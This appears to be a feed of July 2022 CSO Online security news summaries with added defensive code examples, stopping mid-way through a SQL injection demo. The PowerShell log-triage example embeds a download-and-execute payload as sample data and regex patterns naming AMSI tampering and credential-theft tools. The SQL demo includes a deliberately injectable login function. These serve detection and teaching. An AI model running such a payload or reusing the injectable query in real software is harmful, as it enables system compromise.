What's new around the internet

Last one

Src | Date (GMT) | Title | Description | Tags | Stories | Notes
CSO | 2022-07-14 02:00:00 | 5 key considerations for your 2023 cybersecurity budget planning | As CISOs look to prepare their 2023 security budgets, some might be asking themselves, “where do I begin?” The facets of defending an organization against cyber threats are so varied and change so rapidly that sorting out which risks need the most attention can seem overwhelming. Nevertheless, security leaders need to start thinking about how much funding they will need and how they will allocate it. “At a macro level, when defining strategic goals and developing budgets for security, CISOs should know that the status quo will likely leave security leaders with an impossible mission ahead, constrained to maintain operations and new initiatives,” says David Chaddock, director of cybersecurity for consultancy West Monroe. | Guideline | | ★★
CSO | 2022-07-13 09:01:00 | Exostar launches CMMC 2.0-compliant Microsoft 365, other solutions for SMBs | Regulated-industry community builder Exostar has announced updates to its platform designed to help small and medium-sized businesses (SMBs) overcome the technology, time and cost obstacles of preparing for and demonstrating compliance with Cybersecurity Maturity Model Certification (CMMC) 2.0. The latest version of CMMC requires businesses throughout the U.S. Defense Industrial Base (DIB) to be certified as soon as May 2023 in order to take part in subsequent Department of Defense (DoD) contract solicitations; any DIB member that stores or handles controlled unclassified information (CUI) must meet the 110 practices defined at CMMC Level 2. | | |
CSO | 2022-07-13 08:13:00 | BrandPost: Why Hackers Are Increasingly Targeting Digital Supply Chains | For most of the world, the SolarWinds hack of December 2020 was the first real introduction to digital supply chains and their vulnerabilities. But attackers had already been investing in software supply chain attacks, which rose 650% between July 2019 and May 2020 alone. Data from Netscout's 2H 2021 Threat Intelligence Report shows that they remain laser-focused on the digital supply chain: attacks against software publishers rose 606% compared with 1H 2021, attacks on computer manufacturers rose 162%, and attacks on computer storage manufacturers rose 263%. | Hack, Threat | |
CSO | 2022-07-13 02:09:00 | Consulting firms jump on the Zero Trust bandwagon | Within a day of each other, the consulting and outsourcing firms Deloitte and HCL Technologies both launched new managed cybersecurity services, as consultants look to capitalize on the growing appetite for the Zero Trust security model. On Tuesday, Deloitte unveiled its Zero Trust Access managed service, heavily influenced by its recent acquisition of TransientX. On Wednesday, HCL announced a collaboration with Palo Alto Networks to offer managed SASE, cloud security, and threat detection and response to its customers. | Threat | Deloitte |
CSO | 2022-07-13 02:00:00 | 10 tasks for a mid-year Microsoft network security review | It's the middle of 2022 and a good time to review your plans, goals and the risks to your network, especially given the changing threat landscape. Ransomware, for example, has become more human-targeted: operators are looking for additional methods and payloads and are adding extortion. Entry points range from email and phishing lures and unpatched vulnerabilities to more targeted attacks. With that in mind, these are the ten tasks for your mid-year security review. 1. Review access and credential policies for third parties. Attackers scan for exposed Remote Desktop Protocol (RDP) services and run brute-force attacks such as credential stuffing: they know people reuse passwords, so credentials taken from stolen databases are replayed against your network. | Ransomware, Threat | |
CSO | 2022-07-12 14:20:00 | Office 365 phishing campaign that can bypass MFA targets 10,000 organizations | Security researchers at Microsoft have uncovered a large-scale phishing campaign that uses HTTPS proxying (adversary-in-the-middle) to hijack Office 365 accounts: the phishing site relays the genuine login page to the victim, so the session cookie issued after a successful multi-factor authentication (MFA) step is captured along with the password. The campaign has targeted over 10,000 organizations since September 2021. Its goal appears to be business email compromise (BEC), in which a compromised employee mailbox is used to trick colleagues or external business partners into initiating fraudulent money transfers. According to the FBI's Internet Crime Complaint Center (IC3), BEC attacks caused over $43 billion in losses between June 2016 and December 2021. | | |
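Why the proxy works against one-time codes and push prompts but not against FIDO2/WebAuthn: the browser writes the origin the user actually visited into clientDataJSON, and the relying party rejects any assertion whose origin or RP ID is not its own. The relying-party side of that check, as an added example that is not code from the article or from Microsoft (RP ID, origins, the attacker domain and both sample assertions are constructed):

```python
"""Relying-party checks on a WebAuthn assertion that an HTTPS reverse-proxy
phishing page cannot satisfy. Added example, not code from the article or from
Microsoft. RP_ID, EXPECTED_ORIGIN, the attacker domain and both sample
assertions are constructed for illustration."""
import base64
import hashlib
import json
import secrets

RP_ID = "example.com"                          # assumption: the site's relying-party ID
EXPECTED_ORIGIN = "https://login.example.com"  # assumption: the genuine login origin
FLAG_USER_PRESENT = 0x01


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_client_data(origin: str, challenge: str) -> str:
    """clientDataJSON as the browser builds it for navigator.credentials.get()
    on a page served from `origin` (constructed here for the demo)."""
    doc = {"type": "webauthn.get", "challenge": challenge, "origin": origin}
    return b64url_encode(json.dumps(doc).encode())


def make_authenticator_data(rp_id: str, sign_count: int = 1) -> bytes:
    """rpIdHash(32) || flags(1) || signCount(4). The browser only allows an RP ID
    that is a registrable suffix of the page's own origin, so a page on the
    attacker's domain cannot obtain an rpIdHash for example.com."""
    rp_id_hash = hashlib.sha256(rp_id.encode()).digest()
    return rp_id_hash + bytes([FLAG_USER_PRESENT]) + sign_count.to_bytes(4, "big")


def verify_assertion(client_data_b64: str, authenticator_data: bytes,
                     expected_challenge: str, rp_id: str = RP_ID,
                     expected_origin: str = EXPECTED_ORIGIN):
    """Return (ok, reason). The signature check over
    authenticatorData || SHA-256(clientDataJSON) is omitted here; a real RP
    must also perform it with the credential's registered public key."""
    try:
        client_data = json.loads(b64url_decode(client_data_b64))
    except ValueError:
        return False, "clientDataJSON unparsable"
    if client_data.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    # Constant-time compare; the challenge is single-use, so a captured
    # assertion cannot be replayed later.
    if not secrets.compare_digest(str(client_data.get("challenge", "")), expected_challenge):
        return False, "challenge mismatch or replay"
    # This is the check that defeats the proxy: the browser records the origin
    # the user actually visited, not the one the proxy talks to upstream.
    if client_data.get("origin") != expected_origin:
        return False, "origin mismatch: " + str(client_data.get("origin"))
    if len(authenticator_data) < 37:
        return False, "authenticatorData too short"
    if authenticator_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash mismatch"
    if not authenticator_data[32] & FLAG_USER_PRESENT:
        return False, "user presence flag not set"
    return True, "ok"


def demo():
    """A genuine login versus the same challenge relayed through a phishing proxy."""
    challenge = b64url_encode(secrets.token_bytes(32))
    legit = verify_assertion(make_client_data(EXPECTED_ORIGIN, challenge),
                             make_authenticator_data(RP_ID), challenge)
    # The proxy forwards the RP's challenge unchanged, but the browser signs the
    # origin and RP ID of the page it is really on: the attacker's (constructed).
    phish_origin = "https://login-example.com.attacker.test"
    phished = verify_assertion(make_client_data(phish_origin, challenge),
                               make_authenticator_data("attacker.test"), challenge)
    return legit, phished


if __name__ == "__main__":
    print(demo())
```

The same property is what makes TOTP and push approval phishable: neither carries the origin, so whatever the user types or approves on the proxy page is valid at the real site.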
CSO | 2022-07-12 13:51:00 | U.S. NDAA heads into the home stretch with significant cybersecurity amendments pending | In late June, the House Armed Services Committee approved its version of the National Defense Authorization Act (NDAA) for fiscal year 2023 with a $37 billion funding increase over what President Joe Biden requested. This week the full House will debate the must-pass funding legislation. The NDAA, enacted every year to fund the U.S. military, has in previous years been the vehicle through which a wide swath of cybersecurity legislation has passed, given the difficulties standalone cybersecurity bills have faced. According to the nonprofit research organization Third Way, from 2017 to 2021 members of Congress included 290 cyber-related provisions in the NDAAs, with the last two NDAAs accounting for 60% of them. | | |
CSO | 2022-07-12 12:06:00 | BrandPost: Enterprises Need More Protection Against DDoS Attacks | Cloud-only distributed denial-of-service (DDoS) protection providers have been available for some time, but as services have become more mission-critical with less tolerance for downtime, and application-layer DDoS attacks have become more complex, cloud-only solutions are no longer enough. Research and experience have shown that a multilayered DDoS defense strategy is the only holistic approach to modern DDoS threats, and for several years the analyst community has voiced strong support for such a strategy backed by continuous threat intelligence. Some of today's targeted, complex attacks require on-premises components; because some attack types evade cloud solutions, purpose-built on-premises DDoS protection devices should be considered the foundation of a network DDoS protection posture. | Threat | |
CSO | 2022-07-12 08:32:00 | Concentric launches new data privacy and cybersecurity solution Eclipse | Private risk consultancy Concentric has announced the launch of Eclipse, a new “turnkey solution” designed to provide enhanced cybersecurity and digital privacy to users. According to the company, the platform offers tiered subscriptions, “à la carte” services, and defense in depth across consumer identities, devices, accounts and network connections. The release comes as cybercrime continues to plague organizations across the globe and data becomes a key commodity for malicious cyber actors. Eclipse is available in multi-tier and standalone options: in a press release, Concentric stated that Eclipse packages are offered to all users in three tiers. | | |
CSO | 2022-07-12 07:06:00 | Barracuda report: Almost everyone faced an industrial attack in the last year | A report commissioned by cloud security company Barracuda found that 94% of respondents experienced some form of attack on their industrial IoT (IIoT) or operational technology (OT) systems during the last 12 months. The State of Industrial Security in 2022 report surveyed 800 senior IT and security officers responsible for such systems. “In the current threat landscape, critical infrastructure is an attractive target for cybercriminals, but unfortunately IIoT/OT security projects often take a backseat to other security initiatives or fail due to cost or complexity, leaving organizations at risk,” said Tim Jefferson, senior vice president for data protection, network, and application security at Barracuda, in a statement accompanying the report. | Threat | |
CSO | 2022-07-12 05:00:00 | Catalogic Software adds newer detection and backup capabilities | Catalogic Software has announced the latest version of its DPX enterprise data protection software, DPX 4.8.1, which now includes GuardMode for early detection of ransomware and DPX vPlus, cloud backup support for Microsoft 365 and other open virtualization platforms. Catalogic DPX is a proprietary data protection platform for backing up data and applications from virtual machines. According to Catalogic COO Sathya Sankaran, VMware and Hyper-V make up about 80% of the hypervisor market, while the remaining 20% is a mix of players, including Microsoft 365, and various open source options such as XenServer, Oracle VM, KVM, Red Hat, Acropolis, OpenStack and RHV/oVirt. DPX vPlus will support these other hypervisors, which Sankaran says are “usually neglected” by other backup solutions. | | |
CSO | 2022-07-12 02:00:00 | Locked in: How long is too long for security vendor contracts? | Stephanie Benoit Kurtz thought she had a good deal when, in one of her former CISO roles, she signed a three-year contract with a vendor for vulnerability management as a service. Benoit Kurtz inked the deal expecting that her security operations program would make full use of all the offered features, but found early in the three-year stretch that her team used only about 60% of them. She says she was in a bind: paying for a product that wasn't really the right fit, with no way out of the contract. “It's hard to go back to the manufacturer and say, 'I didn't need that module, so can I get my money back?' They don't seem to want to engage in that conversation,” says Benoit Kurtz, a former security executive who is now lead faculty for the College of Information Systems and Technology at the University of Phoenix. | Vulnerability, Guideline | |
CSO | 2022-07-11 06:00:00 | BrandPost: The Top 3 AI Myths in Cybersecurity | Whether in novels or in the movies based on them, artificial intelligence has been a subject of fascination for decades. While the synthetic humans envisioned by Philip K. Dick remain (fortunately) the stuff of science fiction, artificial intelligence is real and plays an increasingly large role in many aspects of our lives. It's fun to root against (or maybe for) human-like robots with AI brains, but a much more mundane, and equally powerful, form of AI is starting to play a role in cybersecurity. The goal is for AI to be a force multiplier for hardworking security professionals. Security operations center (SOC) analysts, as the most recent Devo SOC Performance Report™ showed, are often overwhelmed by the never-ending number of alerts that hit their screens each day; alert fatigue has become an industry-wide cause of analyst burnout. | | |
CSO | 2022-07-11 02:00:00 | Understanding your API attack surface: How to get started | We live in a world of cloud computing, mobile devices and microservices. Nearly every application we interact with is powered by APIs, often many of them, especially with the leading cloud service providers (CSPs), mobile applications and microservice environments. That makes APIs a critical part of an organization's attack surface. Akamai estimates that roughly 83% of internet traffic is API-based. Salt Security reports that API attacks increased over 600% from 2021 to 2022, and Gartner predicts that 90% of web-enabled applications will have broader attack surfaces because of exposed APIs. The latest study from Imperva claims that vulnerable APIs cost organizations between $40 billion and $70 billion annually. | Studies, Guideline | |
CSO | 2022-07-11 02:00:00 | How Code42 automates insider risk response | Jadee Hanson's security analysts are always on the lookout for risky behaviors, so it's not surprising that they sometimes spot business-unit colleagues acting in concerning ways, such as publicly sharing a document that might contain sensitive data. When that happens, an analyst reaches out to the colleague to determine whether any security rules were violated and to confirm that the colleague understands the company's cybersecurity best practices. Hanson, CISO and CIO of cybersecurity software company Code42, sees value in that outreach: it can catch and correct problematic behavior, provide an opportunity for security awareness training, and identify a potential policy breach at an early stage. | | |
CSO | 2022-07-08 13:08:00 | Feds wave red flag over Maui ransomware | The FBI, CISA and the U.S. Treasury Department have issued a cybersecurity advisory about the ransomware known as Maui. The agencies assert that North Korean state-sponsored cyber actors have used the malware since at least May 2021 to target healthcare and public health sector organizations. The FBI surmises that the actors target healthcare organizations because those entities are critical to human life and health and are therefore more likely to pay a ransom than risk disruption to their services; for that reason, the agencies expect the state-sponsored actors to continue targeting healthcare. | Ransomware, Malware, Threat | |
CSO | 2022-07-07 15:39:00 | BrandPost: The Zero-Trust Pillars of Security | The National Institute of Standards and Technology's (NIST) zero-trust security framework presents a new way of solving the age-old problem of securing networks and information, and organizations of all sizes are rethinking their security architecture, processes and procedures to adopt zero-trust principles. According to NIST, “Zero trust (ZT) is the term for an evolving set of cybersecurity paradigms that move defenses from static, network-based perimeters to focus on users, assets, and resources. A zero trust architecture (ZTA) uses zero trust principles to plan industrial and enterprise infrastructure and workflows. Zero trust assumes there is no implicit trust granted to assets or user accounts based solely on their physical or network location or based on asset ownership ... Zero trust focuses on protecting resources, not network segments, as the network location is no longer seen as the prime component to the security posture of the resource.” | | |
CSO | 2022-07-07 14:49:00 | BrandPost: How Blocking and Controlling Traffic Can Stop DDoS Attacks | With more than 4.4 million distributed denial-of-service (DDoS) attacks recorded in the second half of 2021, such attacks are always happening; it's not a matter of if a company will be hit by one, but when. Enterprises don't have to cower and wait for the inevitable, though. Enterprises and service providers can block 90% of DDoS attacks with two simple steps: blocking IP address spoofing and controlling inbound traffic. Blocking spoofed traffic: IP address spoofing occurs when a device forges its source address to impersonate another device. It is the attacker's preferred move when launching reflection/amplification attacks, because spoofing the source IP address makes an unwitting service send its replies to the victim under attack. | | |
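The two steps above expressed as a per-packet decision: strict source validation on customer ports (BCP 38), a bogon list, dropping packets that claim one of our own prefixes when they arrive from a peer, and rate-limiting unsolicited replies from well-known reflector ports. This is an added example, not code from the article or from NETSCOUT; interface names, prefixes, the port list and the packets are constructed.

```python
"""BCP 38 style ingress filtering plus a reflection-port check, written as a
per-packet decision function. Added example, not code from the article or from
NETSCOUT. Interface names, prefixes, the port list and the packets are constructed."""
import ipaddress
from dataclasses import dataclass

# Assumption: customer-facing interfaces and the prefixes legitimately sourced behind each.
INTERFACE_PREFIXES = {
    "cust-a": [ipaddress.ip_network("203.0.113.0/24")],
    "cust-b": [ipaddress.ip_network("198.51.100.0/25"),
               ipaddress.ip_network("2001:db8:100::/48")],
}

# Source addresses that must never appear on the wire (private, loopback,
# link-local, multicast, documentation ranges).
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.0.2.0/24", "192.168.0.0/16", "224.0.0.0/3",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]

# UDP services commonly abused as reflectors. Unsolicited replies from these
# source ports are rate-limited rather than dropped, because a genuine resolver
# or NTP reply to a client looks exactly the same.
REFLECTOR_SRC_PORTS = {19: "chargen", 53: "dns", 123: "ntp", 161: "snmp",
                       389: "cldap", 1900: "ssdp", 11211: "memcached"}


@dataclass
class Packet:
    iface: str
    src: str
    dst: str
    proto: str = "udp"
    sport: int = 0
    dport: int = 0


def is_bogon(addr) -> bool:
    return any(addr in net for net in BOGONS)


def ingress_decision(pkt, prefixes=INTERFACE_PREFIXES, reflector_ports=REFLECTOR_SRC_PORTS):
    """Return (action, reason) for a packet arriving on pkt.iface."""
    src = ipaddress.ip_address(pkt.src)
    if is_bogon(src):
        return "drop", "bogon source address"
    allowed = prefixes.get(pkt.iface)
    if allowed is not None:
        # Customer port: the source must belong to that customer (BCP 38 / strict uRPF).
        if any(src in net for net in allowed):
            return "accept", "source belongs to " + pkt.iface
        return "drop", "source %s is not assigned to %s" % (src, pkt.iface)
    # Transit or peer port: packets claiming one of our own prefixes cannot be genuine.
    if any(src in net for nets in prefixes.values() for net in nets):
        return "drop", "our own prefix arriving from outside"
    # A reflection flood is a stream of replies from a well-known service port
    # to an ephemeral port the victim never opened.
    if pkt.proto == "udp" and pkt.sport in reflector_ports and pkt.dport >= 1024:
        return "rate-limit", "possible %s reflection" % reflector_ports[pkt.sport]
    return "accept", "no filter matched"


# Constructed packets: a legitimate customer flow, an RFC 1918 source, a customer
# spoofing another customer's range, our prefix spoofed from a peer, and a
# memcached reflection flood.
SAMPLE_PACKETS = [
    Packet("cust-a", "203.0.113.7", "198.51.100.200", "udp", 40000, 53),
    Packet("cust-a", "192.168.1.5", "198.51.100.200", "udp", 40000, 53),
    Packet("cust-a", "198.51.100.9", "203.0.113.200", "tcp", 40000, 80),
    Packet("peer-1", "203.0.113.200", "198.51.100.5", "tcp", 443, 51000),
    Packet("peer-1", "198.51.100.200", "203.0.113.9", "udp", 11211, 45678),
]


def run_samples():
    return [ingress_decision(p)[0] for p in SAMPLE_PACKETS]


if __name__ == "__main__":
    for p in SAMPLE_PACKETS:
        print(p.iface, p.src, "->", ingress_decision(p))
```

On a router the first two rules are a single feature (`ip verify unicast source reachable-via rx` on Cisco IOS, or a source-address ACL per customer port); the point of the function is to show what the rule has to decide and why reflector replies need a rate limit rather than a hard drop.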
CSO | 2022-07-07 14:39:00 | Wiz offers CVE-like cloud vulnerability registry, but will it gain traction? | Cloud security company Wiz recently announced a community-based website, cloudvulndb.org, that provides a centralized, publicly accessible database of cloud vulnerabilities. While the database fills gaps left by MITRE's CVE system and the current shared-responsibility model for cloud security issues, it will need broad industry support to succeed, according to security experts. The new database continues Wiz's efforts to streamline the detection and management of cloud vulnerabilities, which, it says, often fall through the cracks between current systems. | Vulnerability | |
CSO | 2022-07-07 10:00:00 | Splashtop teams with Acronis for remote security support | Acronis and Splashtop announced a partnership on Wednesday that promises to make troubleshooting security problems on endpoints easier. Under the deal, Splashtop's secure remote access software will be integrated with Acronis Cyber Protect Cloud, a backup and cybersecurity platform, so technicians can take control of computers and resolve issues without leaving the Acronis console. The arrangement should be especially attractive to managed services providers (MSPs), who use the Acronis platform to let their support staff reach clients' devices for faster incident remediation and more efficient technical support. Splashtop can also provide on-demand help desk support to any computer or mobile device, regardless of device type or operating system, and can let users reach their work computers remotely. | | |
CSO | 2022-07-07 08:19:00 | Revelstoke's SOAR to improve case management with replicable sub-workflows | Security orchestration, automation and response (SOAR) company Revelstoke has announced enhancements to its CASE management capabilities that let security analysts replicate repetitive tasks. Revelstoke's Case Automation Security Execution (CASE) management platform will use the company's in-house unified data layer (UDL) to build and deploy automated, logic-based sub-workflows for reuse, the company said in a statement. "This CASE functionality furthers Revelstoke's mission of putting sophisticated security automation in the hands of the security analysts that desperately need it to free them from the manual, repetitive tasks that bog them down," said Josh McCarthy, chief product officer and co-founder at Revelstoke. "This functionality allows them to have powerful blocks of reusable actions that they can apply to any and all cases that come into the system." | | |
CSO | 2022-07-07 06:17:00 | Apple slaps hard against 'mercenary' surveillance-as-a-service industry | The company is introducing Lockdown Mode to protect high-risk individuals against corrosive surveillance and attacks, and is investing millions to improve protection on its devices. | | |
CSO | 2022-07-07 04:26:00 | U.S. and UK warn local governments, businesses of China's influence operations | In a concerted effort to spread the word about the threat China poses to state and local governments and to businesses of all sizes, the U.S. National Counterintelligence and Security Center (NCSC) has issued a “Safeguarding Our Future” bulletin. “Protecting Government and Business Leaders at the U.S. State and Local Level from People's Republic of China (PRC) Influence Operations” differs from previous warnings about China's use of social networks, pseudo-state-sponsored hackers and the like: the NCSC highlights how the Chinese intelligence apparatus takes a whole-of-government approach to acquiring information in support of Chinese Communist Party (CCP) directives. | Threat, Guideline | |
CSO | 2022-07-07 02:00:00 | How the US DHS develops hard-to-find cybersecurity skills | Cybersecurity skills are in short supply, and specialized cybersecurity skills are even harder to find. Take identity and access management skills, for which employers pay an average 17% premium over base pay, according to the most recent figures from the Foote Partners IT skills and pay index. Fortunately for the US Department of Homeland Security (DHS), Amanda Conley does not shy away from sourcing rare and specialized skills. In her first staffing role after college she found and staffed the skills needed to design, manufacture and service aircraft engines and auxiliary power units. “That's when I realized that having the right skills is a competitive advantage for my organization,” she explains. After that, she worked in the public sector, recruiting, hiring and developing skills for a variety of agencies. | | |
CSO | 2022-07-07 02:00:00 | 5 things security pros want from XDR platforms | According to new research from ESG and the Information Systems Security Association (ISSA), 58% of organizations are consolidating, or considering consolidating, the number of security vendors they do business with. It is simply too hard to manage an army of disconnected security point tools, each requiring its own training, implementation, administration and ongoing support. | | |
CSO | 2022-07-06 16:17:00 | Attacker groups adopt new penetration testing tool Brute Ratel | Security researchers have recently identified several attack campaigns that use APT-like targeting techniques and deploy Brute Ratel C4 (BRc4), a relatively new adversary simulation framework. Attackers abusing penetration testing tools is nothing new, as Cobalt Strike and Metasploit's Meterpreter have been used by threat groups for years, but Brute Ratel is built around detection evasion, so it may pose a real challenge to defense teams. "The emergence of a new penetration testing and adversary emulation capability is significant," researchers from security firm Palo Alto Networks said in a new report analyzing several recent samples. "Yet more alarming is the effectiveness of BRc4 at defeating modern defensive EDR and AV detection capabilities." | Tool, Threat | |
CSO | 2022-07-06 09:58:00 | Smart factories unprepared for cyberattacks | Organizations that operate smart factories largely agree that cybersecurity is a critical component of their operations. Many, however, are unprepared to deal with the growing number of cyberthreats against them, according to a report released last week by Capgemini, a provider of technology and digital transformation consulting services. The report, based on a survey of 950 organizations globally, finds that 80% agree cybersecurity is a critical component of a smart factory's operations, and while more than half (51%) expect the number of cyberattacks to increase over the next 12 months, their current levels of preparedness are low. | | |
CSO | 2022-07-06 09:38:00 | BrandPost: 5 Attack Elements Organizations Should Monitor: Anatomy of an External Attack Surface | In today's landscape of cloud computing and decentralized work, external attack surfaces have grown to encompass multiple clouds, complex digital supply chains and massive third-party ecosystems. For organizations, this means rethinking what comprehensive security looks like in the face of ongoing global cyber threats. Security teams now have to defend their organization's presence across the Internet the same way they defend operations behind their firewalls, and as more organizations adopt Zero Trust principles, protecting both internal and external attack surfaces becomes an Internet-scale challenge. | | |
CSO | 2022-07-06 08:33:00 | BrandPost: Advancing Cybersecurity Skillsets Helps Organizations Against Threats | Worldwide, 80% of organizations suffered one or more breaches that they could attribute to a lack of cybersecurity skills and/or awareness, according to Fortinet's recently published 2022 Cybersecurity Skills Gap research report. The lack of qualified cybersecurity professionals is a massive global problem affecting all types of organizations. Because the cybersecurity workforce is not growing fast enough to keep up with new threats, Fortinet has pledged to do something about it: by 2026, it is committed to training at least one million people in cybersecurity via its Training Advancement Agenda (TAA) and Training Institute programs. | Threat | |
CSO | 2022-07-06 03:56:00 | An updated pipeline security directive is underway, reflecting TSA struggles | In the immediate aftermath of the devastating ransomware attack on Colonial Pipeline, the U.S. Transportation Security Administration (TSA) issued in May 2021 a hastily prepared security directive requiring oil and gas pipeline companies to report every security incident to the Cybersecurity and Infrastructure Security Agency (CISA) no later than 12 hours after identifying it. Companies that fail to meet this and the directive's other security requirements are reported to be subject to fines starting at $7,000 per day. | | |
CSO | 2022-07-06 02:00:00 | How to keep attackers from using PowerShell against you | Living off the land is not the title of a gardening book; it's the goal of attackers going after your network. Rather than installing malicious software that antivirus might flag, attackers use the code already there to launch attacks: the tools you use to monitor, maintain and access your network are often the same code attackers use against it, and PowerShell is a prime example. The U.S. National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), New Zealand's NCSC and the UK's NCSC recently released a document called Keeping PowerShell: Security Measures to Use and Embrace. It recommends keeping PowerShell in your network rather than blocking it, and offers advice on keeping it secure. | Tool | |
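The logging that guidance recommends is only worth enabling if someone reads it. An added example, not code from the article or from the agencies' document, that triages constructed process-creation (event 4688, or Sysmon event 1) and script block (event 4104) records, decoding any -EncodedCommand payload before pattern matching so that the usual base64 wrapper hides nothing:

```python
"""Triage of PowerShell evidence from two Windows log sources: process-creation
command lines (event 4688, or Sysmon event 1) and script block text (event 4104,
present only once Script Block Logging is enabled). Added example; not code from
the article or from the NSA/CISA/NCSC guidance. All events are constructed."""
import base64
import json
import re

SUSPICIOUS = [
    (r"(?i)\bInvoke-Expression\b|\bIEX\b", "dynamic code execution"),
    (r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", "remote payload fetch"),
    (r"(?i)FromBase64String", "base64-decoded payload"),
    (r"(?i)-nop\b|-noprofile\b", "profile bypass"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"(?i)AmsiUtils|amsiInitFailed", "AMSI tampering"),
    (r"(?i)Invoke-Mimikatz|sekurlsa", "credential theft tooling"),
]
# -EncodedCommand and its short forms carry UTF-16LE text as base64.
ENCODED = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENCODED.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event):
    """Score one event. The decoded payload is scanned together with the raw text."""
    text = event.get("ScriptBlockText") or event.get("CommandLine") or ""
    decoded = decode_encoded_command(text)
    to_scan = text if decoded is None else text + "\n" + decoded
    indicators = [label for pattern, label in SUSPICIOUS if re.search(pattern, to_scan)]
    if decoded is not None:
        indicators.insert(0, "encoded command")
    return {"record": event.get("RecordId"), "event_id": event.get("EventId"),
            "user": event.get("User"), "score": len(indicators),
            "indicators": indicators, "decoded": decoded}


def triage_log(lines):
    """Parse a JSON-lines export and return the suspicious events, worst first."""
    results = [triage_event(json.loads(line)) for line in lines if line.strip()]
    return sorted((r for r in results if r["score"] > 0), key=lambda r: -r["score"])


# Constructed events. Record 102 is the way a dropper typically launches a
# downloader: powershell -nop -w hidden -enc <base64 of UTF-16LE script>.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    json.dumps({"RecordId": 101, "EventId": 4104, "User": "CORP\\jdoe",
                "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"}),
    json.dumps({"RecordId": 102, "EventId": 4688, "User": "CORP\\svc-print",
                "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD}),
    json.dumps({"RecordId": 103, "EventId": 4104, "User": "CORP\\admin",
                "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"}),
]

if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(finding)
```

Pattern lists like this are a starting point, not a detection strategy: the reason to keep 4104 logging on is that it records the script text after PowerShell has de-obfuscated it, which is where the higher-fidelity signals live.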
CSO | 2022-07-06 02:00:00 | What is decentralized identity? | Decentralized identity (DID) challenges some core assumptions about how online authentication works, in particular the idea that a third-party authority is required to manage the sensitive data that makes up an identity. DID holds out the promise of reducing reliance on such authorities and returning some control over the data to its owner, with possible privacy and accessibility benefits. Traditionally, digital identity is maintained by organizations trusted to secure that information in their data stores. Over time this model has revealed several shortcomings, which can be summarized as follows: | | |
CSO | 2022-07-06 02:00:00 | NIST names new post-quantum cryptography standards | The path to a secure future in a world with quantum computers just became a bit clearer. This week, the U.S. National Institute of Standards and Technology (NIST) announced the algorithms chosen in the third round of its competition to create a post-quantum cryptography (PQC) standard built on algorithms that can resist quantum computers. The announcement had several layers. At the core were the choices for the main algorithms: CRYSTALS-Kyber for key establishment and CRYSTALS-Dilithium for digital signatures. Both rest on the same theoretical approach (structured lattices), which could make it simpler to implement both together. NIST also announced that the digital signature algorithms Falcon and SPHINCS+ will be standardized, and that it will continue to study several other key-establishment algorithms in a fourth round, possibly standardizing some of them. | | |
CSO | 2022-07-05 11:52:00 | APT campaign targeting SOHO routers highlights risks to remote workers | A targeted attack campaign has been compromising home and small-business routers since late 2020 with the goal of hijacking network communications and infecting local computers with stealthy, sophisticated backdoors. Attacks against home routers are not new, but the implants used here were designed for local network reconnaissance and lateral movement rather than just abusing the router itself. "The rapid shift to remote work in spring of 2020 presented a fresh opportunity for threat actors to subvert traditional defense-in-depth protections by targeting the weakest points of the new network perimeter -- devices which are routinely purchased by consumers but rarely monitored or patched -- small office/home office (SOHO) routers," researchers from Black Lotus Labs, the threat intelligence arm of telecommunications company Lumen Technologies, said in a recent report. | Threat | |
CSO | 2022-07-05 03:40:00 | SQL injection, XSS vulnerabilities continue to plague organizations | Despite years at the top of vulnerability lists, SQL injection and cross-site scripting (XSS) flaws remain the bane of security teams, according to a new report by a penetration-testing-as-a-service company. The report by BreachLock, based on 8,000 security tests performed in 2021, organizes its findings by risk: critical findings pose a very high threat to a company's data; high risks could have a catastrophic effect on an organization's operations, assets or individuals; medium risks could have an adverse impact on operations, assets or individuals. | Vulnerability, Threat | |
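Both flaws come from the same mistake: concatenating untrusted input into a language (SQL, HTML) that is then interpreted. An added example, not code from the article or from BreachLock, showing the vulnerable form next to its fix on a constructed in-memory SQLite schema, with the attack strings that separate the two:

```python
"""SQL injection and stored XSS: the vulnerable pattern next to its fix, run
against an in-memory SQLite database. Added example, not code from the article
or from BreachLock; the schema, rows and attack strings are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT, bio TEXT)")
    # password_hash stands in for a real slow hash; the values are placeholders.
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "hash-of-alice-pw", "likes cats"),
        ("bob", "hash-of-bob-pw", "<b>bold</b> bio"),
    ])
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password_hash: str) -> list:
    """Builds the query with string formatting: attacker text becomes SQL syntax."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password_hash = '%s'"
             % (username, password_hash))
    return [row[0] for row in conn.execute(query)]


def login_fixed(conn, username: str, password_hash: str) -> list:
    """Parameterised query: values travel separately from the statement and can
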